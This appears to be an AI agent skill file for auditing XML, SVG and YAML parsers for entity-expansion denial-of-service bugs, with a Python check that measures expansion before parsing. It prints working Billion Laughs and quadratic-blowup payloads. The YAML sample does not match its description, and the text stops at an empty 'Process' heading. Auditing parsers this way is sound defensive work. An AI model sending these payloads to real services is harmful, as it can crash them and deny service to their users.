Install: claude install-skill Liaabnormal676/find-cve-agent
# Entity Expansion (Billion Laughs) Detection
## When to Use
Audit any package that parses XML, SVG, HTML with entity support, or YAML with alias/anchor support. This includes:
- XML/SVG parsing libraries
- Document processors (DOCX, XLSX, RSS, Atom, SOAP)
- YAML parsers with alias expansion
- Configuration file parsers
~90% CVE acceptance rate when confirmed.
## Key Insight
Many parsers have no default entity expansion limit. A 1KB XML payload with nested entity definitions can expand to 1GB+ in memory, and the resulting OOM kill cannot be caught by the application: the process simply dies.
## Entity Expansion Types
### 1. Billion Laughs (Internal Entity Recursion)
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>
```
Each level multiplies the expanded size by 10. Level 9 = 10^9 = 1 billion "lol" strings.
### 2. Quadratic Blowup (Single Entity Repeated)
```xml
<!DOCTYPE foo [
<!ENTITY a "AAAAAAAAAA..."> <!-- 50KB entity -->
]>
<root>&a;&a;&a;&a;&a;...&a;</root> <!-- 50000 references -->
```
Less dramatic but still effective — 50KB entity × 50000 refs = 2.5GB.
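As an added example (not part of the original skill), the following pre-parse check computes the expanded size of types 1 and 2 arithmetically from the internal DTD subset, so an audit can measure amplification without ever materializing the expansion. The regexes, function names, the 100x threshold and the `e0`..`eN` sample are assumptions for illustration; it is a heuristic that ignores parameter and external entities.

```python
import re

# Heuristic regexes for the internal DTD subset; this is not a full XML parser.
DECL = re.compile(r'<!ENTITY\s+([\w.-]+)\s+(["\'])(.*?)\2\s*>', re.S)
REF = re.compile(r'&([\w.-]+);')
DOCTYPE = re.compile(r'<!DOCTYPE[^\[>]*\[.*?\]\s*>', re.S)
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}

def expanded_size(xml_text):
    """Length of the document body after entity expansion, computed arithmetically."""
    decls = {}
    for m in DECL.finditer(xml_text):
        decls.setdefault(m.group(1), m.group(3))  # first declaration wins in XML
    sizes = {}  # memo: entity name -> expanded length

    def measure(text, stack):
        total = len(REF.sub("", text))  # literal characters; undeclared refs count as 0
        for name in REF.findall(text):
            if name in PREDEFINED:
                total += 1
            elif name in stack:
                raise ValueError(f"recursive entity: {name}")
            elif name in decls:
                if name not in sizes:
                    sizes[name] = measure(decls[name], stack | {name})
                total += sizes[name]
        return total

    body = DOCTYPE.sub("", xml_text, count=1)  # measure everything outside the DOCTYPE
    return measure(body, frozenset())

def is_amplifying(xml_text, max_ratio=100):
    """True when expansion would exceed max_ratio times the input size (assumed threshold)."""
    return expanded_size(xml_text) > max_ratio * len(xml_text)

def nested_sample(levels):
    # Constructed input: e0 is "lol"; each later entity references the previous one 10 times.
    ents = ['<!ENTITY e0 "lol">']
    for i in range(1, levels + 1):
        refs = f"&e{i - 1};" * 10
        ents.append(f'<!ENTITY e{i} "{refs}">')
    return f'<!DOCTYPE lolz [{"".join(ents)}]><root>&e{levels};</root>'

if __name__ == "__main__":
    doc = nested_sample(9)
    print(len(doc), "input bytes ->", expanded_size(doc), "expanded bytes")
```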
### 3. YAML Alias Expansion
```yaml
a: &anchor
x: *anchor
y: *anchor
```
Recursive alias references can cause exponential expansion in some YAML parsers.
## Process